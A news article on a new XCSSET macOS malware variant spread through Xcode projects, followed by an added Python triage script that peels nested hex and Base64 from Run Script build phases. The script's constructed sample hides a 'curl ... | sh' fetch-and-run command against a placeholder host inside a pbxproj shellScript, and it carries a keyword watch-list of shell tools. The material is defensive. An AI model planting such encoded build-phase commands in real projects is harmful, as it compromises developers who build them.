Microsoft has identified a new macOS malware found in Xcode projects in the wild; notably, it is a variant of the existing XCSSET malware, with new abilities.

The Microsoft Threat Intelligence team wrote on X that this is the first known variant since 2022. This malware features improved obfuscation techniques, updated persistence mechanisms, and new infection strategies, all of which suggest it is a more advanced and capable form of malware with greater potential to cause harm. These new capabilities add to its already sophisticated features, such as targeting digital wallets, extracting data from the Notes app, and accessing system information files.

What you need to know about the latest XCSSET malware variant

Microsoft reported on X that this new variant has better obfuscation techniques, utilising a more randomised approach for generating payloads within Xcode projects. In fact, both its encoding technique and the number of encoding iterations are randomised.

Additionally, Microsoft noted that this variant incorporates Base64 encoding alongside the older XXD hex dump method for encoding. Simply put, this makes it significantly harder to determine the malware’s intent and functionality.

The Microsoft Threat Intelligence team also explained that the malware's persistence mechanism ensures that every time Launchpad is started, both Launchpad itself and a malicious payload are executed. Furthermore, new infection techniques have been introduced, including new methods for placing payloads within targeted Xcode projects.

What should users do to stay safe?

As a precaution, the Microsoft Threat Intelligence team advises users to inspect and verify any Xcode projects they download or clone from online repositories, since this malware primarily spreads through infected projects.
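The advice above is to inspect an Xcode project before building it, and the article notes that payloads are hidden behind a randomised number of Base64 and xxd hex layers. The following triage script is an added example, not Microsoft's or any project's code: it pulls the shellScript of each Run Script build phase out of a project.pbxproj, peels nested hex and Base64 layers in whatever order and count they were applied, and flags keywords in what is left. The pbxproj fragment, the command encoded inside it and the keyword list are all constructed for this example.

```python
import base64
import re

INDICATORS = ("curl", "| sh", "osascript", "eval", "xxd", "base64", "/tmp/")  # constructed watch-list

def _as_text(raw: bytes):
    # A layer counts as decoded only if it yields printable UTF-8 text.
    try:
        text = raw.decode("utf-8")
    except UnicodeDecodeError:
        return None
    return text if text and all(c.isprintable() or c in "\n\t\r" for c in text) else None

def _decode_layer(token: str):
    # One layer of xxd-style hex or Base64; hex first, since even-length hex is also valid Base64.
    if len(token) % 2 == 0 and re.fullmatch(r"[0-9a-fA-F]+", token):
        text = _as_text(bytes.fromhex(token))
        if text is not None:
            return "hex", text
    if len(token) % 4 == 0 and re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", token):
        try:
            text = _as_text(base64.b64decode(token, validate=True))
        except ValueError:
            return None
        if text is not None:
            return "base64", text
    return None

def peel(token: str, max_layers: int = 16):
    # Strip layers in whatever order and number they were applied; returns (kinds outermost first, innermost text).
    layers, text = [], token.strip()
    while len(layers) < max_layers and (hit := _decode_layer(text)):
        kind, text = hit
        layers.append(kind)
    return layers, text.strip()

def scan_pbxproj(pbxproj: str):
    # Peel every long opaque token found inside a shellScript build phase.
    findings = []
    for m in re.finditer(r'shellScript = "((?:[^"\\]|\\.)*)";', pbxproj):
        script = m.group(1).replace('\\"', '"').replace("\\n", "\n")
        for token in re.findall(r"[A-Za-z0-9+/=]{32,}", script):
            layers, inner = peel(token)
            if layers:
                findings.append({"layers": layers, "decoded": inner,
                                 "flags": [k for k in INDICATORS if k in inner]})
    return findings

# Constructed sample: a Run Script phase carrying a three-layer (hex, Base64, hex) encoded
# command. Neither the command nor the host is taken from a real sample.
INNER = "curl -fsSL https://example.invalid/p | sh"
BLOB = base64.b64encode(INNER.encode().hex().encode()).decode().encode().hex()
SAMPLE_PBXPROJ = ('shellScript = "echo ' + BLOB
                  + ' | xxd -r -p | base64 --decode | xxd -r -p | sh\\n";')
```

Run `scan_pbxproj` over the text of a cloned project's project.pbxproj; a finding with several layers and flagged keywords is a reason to stop and read the build phase before opening the project in Xcode.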

A general rule of thumb is to only download and install software from trusted sources and official app stores. Microsoft also confirmed that Microsoft Defender for Endpoint on Mac can detect XCSSET, including this new variant.